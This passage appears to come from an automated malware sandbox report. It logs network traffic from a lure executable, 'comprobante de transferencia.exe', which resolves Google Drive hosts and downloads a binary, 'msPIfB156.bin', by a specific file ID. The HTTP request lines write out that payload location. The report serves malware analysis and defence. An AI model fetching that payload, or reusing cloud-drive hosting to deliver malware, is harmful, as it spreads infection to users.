Mar 18, 2024 15:06:45.902331114 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.902396917 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.902628899 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.906441927 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.906650066 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.906713963 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.906960011 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.910645962 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.910881042 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.912985086 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.913162947 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.913248062 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.913438082 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.917172909 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.917407036 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.917479992 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.917635918 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.921381950 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.921591043 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.921659946 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.921837091 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.925683975 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.925945044 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.926001072 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.926229954 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.930073977 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.930289984 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.930362940 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.930545092 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.934295893 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.934499979 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.934559107 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.934813023 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.938532114 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.938796997 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.938878059 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.939062119 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.943378925 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.943569899 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.943643093 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.943835020 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.947262049 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.947438002 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.947494984 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.947680950 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.950695992 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.950885057 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.950922966 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.951103926 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.955965042 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.956134081 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.956170082 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.956340075 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.958127022 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.958306074 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.958343983 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.958512068 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.961905003 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.962073088 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.964334965 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.964689016 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.964716911 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.964855909 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.968110085 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.968311071 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.968321085 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.968523979 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.971559048 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.971729994 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.971740961 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.971956015 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.973984957 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.974134922 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.974877119 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.975032091 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.976330996 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.976475000 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.977485895 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.977663994 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.979274988 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.979425907 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.979434013 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.979568005 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.981151104 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.981316090 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.981326103 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.981479883 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.983639956 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.984092951 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.984102011 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.984247923 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.985882044 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.986028910 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.986041069 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.986185074 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.988075972 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.988257885 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.988269091 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.988423109 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.990417957 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.990624905 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.990633965 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.990811110 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.993136883 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.993297100 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.993307114 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.993439913 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.995348930 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.995532990 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.995906115 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.996118069 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.996126890 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.996259928 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.998538971 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.998692036 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:45.998703003 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:45.998833895 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.000272036 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.000432968 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.000443935 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.000588894 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.002437115 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.002603054 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.002612114 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.002774954 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.004581928 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.004785061 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.004810095 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.004945040 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.006767988 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.006923914 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.006934881 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.007101059 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.009139061 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.009341955 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.009352922 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.009507895 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.010780096 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.010925055 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.010946989 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.011106968 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.012806892 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.012984037 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.012994051 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.013096094 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.014761925 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.014941931 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.014952898 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.015098095 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.016788006 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.016978025 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.016988039 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.017126083 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.018969059 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.019103050 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.019129992 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.019284010 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.020581961 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.020726919 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.021619081 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.021766901 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.021775961 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.021923065 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.023514032 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.023833036 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.023843050 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.024003029 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.025366068 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.025549889 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.025561094 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.025706053 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.027363062 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.027543068 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.027551889 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.027733088 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.029055119 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.029202938 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.029213905 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.029350996 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.030958891 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.031141043 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.031150103 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.031282902 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.032685995 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.032831907 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.032845974 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.033014059 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.034774065 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.034939051 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.034950018 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.035106897 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.036375999 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.036524057 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.036536932 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.036770105 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.038135052 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.038291931 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.038305044 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.038472891 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.040005922 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.040241957 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.040251970 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.040383101 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.041702986 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.041867018 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.041878939 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.042021036 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.043509960 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.043662071 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.044337034 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.044478893 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.044488907 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.044723034 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.046128988 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.046293974 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.046305895 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.046498060 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.047842026 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.048028946 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.048039913 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.048178911 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.049546003 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.049726009 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.049736977 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.049913883 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.051249027 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.051461935 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.051476955 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.051616907 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.052880049 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.053056002 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.053066015 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.053606987 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.054649115 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.054805994 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.054821968 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.054958105 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.056262970 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.056404114 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.056416035 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.056555986 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.057797909 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.057949066 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.057965994 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.058123112 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.059453964 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.059670925 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.059681892 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.059858084 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.061192036 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.061387062 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.061398029 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.061562061 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.062849998 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.063019037 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.063030958 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.063199043 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.064302921 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.064460993 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.065159082 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.065320015 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.065335035 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.065562963 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.066759109 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.066935062 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.066945076 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.067143917 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.068372965 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.068516016 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.068527937 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.068701982 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.070838928 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.070982933 CET	443	49785	142.251.41.1	192.168.11.20
Mar 18, 2024 15:06:46.070987940 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.071118116 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.071182013 CET	49785	443	192.168.11.20	142.251.41.1
Mar 18, 2024 15:06:46.071196079 CET	443	49785	142.251.41.1	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 18, 2024 15:06:44.086272955 CET	55029	53	192.168.11.20	1.1.1.1
Mar 18, 2024 15:06:44.181320906 CET	53	55029	1.1.1.1	192.168.11.20
Mar 18, 2024 15:06:44.818701982 CET	51600	53	192.168.11.20	1.1.1.1
Mar 18, 2024 15:06:44.914122105 CET	53	51600	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 18, 2024 15:06:44.086272955 CET	192.168.11.20	1.1.1.1	0xe3d	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Mar 18, 2024 15:06:44.818701982 CET	192.168.11.20	1.1.1.1	0xcff	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 18, 2024 15:06:44.181320906 CET	1.1.1.1	192.168.11.20	0xe3d	No error (0)	drive.google.com		142.251.40.142	A (IP address)	IN (0x0001)	false
Mar 18, 2024 15:06:44.914122105 CET	1.1.1.1	192.168.11.20	0xcff	No error (0)	drive.usercontent.google.com		142.251.41.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49784	142.251.40.142	443	8496	C:\Users\user\Desktop\comprobante de transferencia.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-18 14:06:44 UTC	216	OUT	GET /uc?export=download&id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: drive.google.com Cache-Control: no-cache
2024-03-18 14:06:44 UTC	1582	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 18 Mar 2024 14:06:44 GMT Location: https://drive.usercontent.google.com/download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-M5VD8Gb4omLcPfvkagKpOg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49785	142.251.41.1	443	8496	C:\Users\user\Desktop\comprobante de transferencia.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-18 14:06:45 UTC	258	OUT	GET /download?id=1ZlWTWjrz48C7pJUuwTOgfOjeHFK1G_7k&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-03-18 14:06:45 UTC	4687	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ABPtcPoAuImEbEVYNl7ncK1SJnEHiiWRVDcbNPY4DaT6coRfTrbIq0Ku-iToSbWMWsuYY8vj5udY36B7vw Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="msPIfB156.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, 